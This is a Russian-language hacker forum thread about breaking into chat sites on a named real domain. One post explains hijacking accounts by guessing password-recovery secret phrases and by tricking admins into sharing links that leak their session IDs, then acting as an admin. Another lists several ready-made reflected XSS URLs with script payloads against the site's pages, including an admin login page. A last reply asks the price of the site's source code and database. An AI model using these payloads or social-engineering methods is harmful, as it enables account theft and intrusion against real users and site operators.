|
А есть чего-нить на чатах august4u.ru?
Ребята помогите,не надо мне давать конкретно что делать просто скажите что тут возможно и объясните как сделать,пожалуйста помогите!!
Спасибо. _http://russianchat.august4u.ru/ |
тебе сюды http://forum.antichat.ru/thread9471.html все уязвимости были написаны!!! и пока новых ненайдено как найдем так сообщим;)
|
http://forum.antichat.ru/threadnav10550-4-10.html на вот почитай.
|
вообщето что я описывал, часть уже залатали... ищемс новые...
|
Цитата:
если че найдешь отпишися очень интеренсо!! полюбому дырочки есть :d |
спасибо челы =).
|
Цитата:
|
Всем привет) заходил на форум только ради августовских чатов... общаюсь в них был админам одного;) не скрою узнал много интересного... но Дело по моему пишет только "tanzwut" тебе мужик отдельный респект!;)
По аугусту похоже только эта тема открыта осталась... хотелось бы немножко добавить от себя) про пароли и секретные фразы.. пароли естесно меняют все.. а вот к секретным фразам относяца не так внимательно) анкет админов правда не забирал... но в некоторых чатах угнал много(только ради спортивного интереса;) и большенство по секретным фразам ака смена пароля) за частую это был или ник или имя)) еще насчет секретных враз.. тут в другом посте писали что: админ может востановить пароль по этой фразе.. но секретную фразу можно поменять вместе с паролем) про пароли вроди все сказал) теперь собственно зачем заходил) ... до сегодняшнего дня сессию и ид можно было узнать простым вопросом... типа: "слухай (по)друг(а) а дай ссылочку на творчество на первое произведение плиз))".. сам сегодня сидел под ником админа в одном чате... можно было делать всё.. кроме кила, удаления анкет и захода в админку(там похоже ип свиряица.. имхо) но тема прикрылась:(( теперь только сессию можно так узнать, еще ее можно узнать спросив ссылку на смайлы... и собственно цель моего визита) если кто нить знает как узнать ид пользователя(собеседника) напишите пожалуйста в личку! буду очень признателен! за сим откланяюсь пожелав всем удачи и дольнейших поисков багов)))) |
Вобщем от делать нечего
_http://august4u.ru/creation/write.inc?id="><script>alert(/bla/);</script>
_http://august4u.ru/creation/write.inc?preview=1&Name=Admin%20%CB%CE%D5 _http://august4u.ru/creation/write.inc?preview=1&sessname="><script>alert(/bla/);</script> _http://august4u.ru/creation/write.inc?AuthorProfile=1&sessname="><script>alert (/bla/);</script> _http://august4u.ru/creation/write.inc?AuthorProfile=1&id="><script>alert(/bla/);</script> _http://august4u.ru/admin/auth/auth.php?AuthTitle=<script>alert(/bla/);</script> _http://august4u.ru/admin/auth/auth.php?AuthError=<script>alert(/bla/);</script> :rolleyes: Летс Гоу.......... |
Летс Гоу..........[/QUOTE]
сколько хочешь за исходники и БД? |
| Время: 00:40 |